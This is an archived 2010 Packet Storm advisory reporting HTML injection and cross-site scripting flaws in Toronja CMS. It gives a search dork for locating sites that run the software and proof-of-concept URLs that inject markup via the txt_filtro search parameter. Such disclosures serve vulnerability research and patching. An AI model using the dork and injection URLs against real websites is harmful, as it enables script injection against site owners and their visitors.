Toronja CMS Cross Site Scripting / HTML Injection

2010-05-28T00:00:00
ID PACKETSTORM:90042
Type packetstorm
Reporter CoBRa_21
Modified 2010-05-28T00:00:00

Description

                                        
                                            `  
  
  
-------------------------------------------------------------------------------------------  
  
Toronja Cms HTML/XSS Injection Vulnerability  
  
-------------------------------------------------------------------------------------------  
  
Author : CoBRa_21  
  
Script Home : http://www.toronja.com.pe/  
  
Dork : intext:"sitio web diseñado por www.toronja.com.pe"  
  
-------------------------------------------------------------------------------------------  
  
HTML Injection:  
  
http://localhost/[path]/index.php?plantilla=busqueda&txt_filtro=<font size=15 color=green>CoBRa_21</font>HTML  
  
-------------------------------------------------------------------------------------------  
  
XSS Injection:  
  
http://localhost/[path]/index.php?plantilla=busqueda&txt_filtro=XSS  
  
-------------------------------------------------------------------------------------------  
  
  
_________________________________________________________________  
Yeni Windows 7: Size en uygun bilgisayarı bulun. Daha fazla bilgi edinin.  
http://windows.microsoft.com/shop  
  
  
`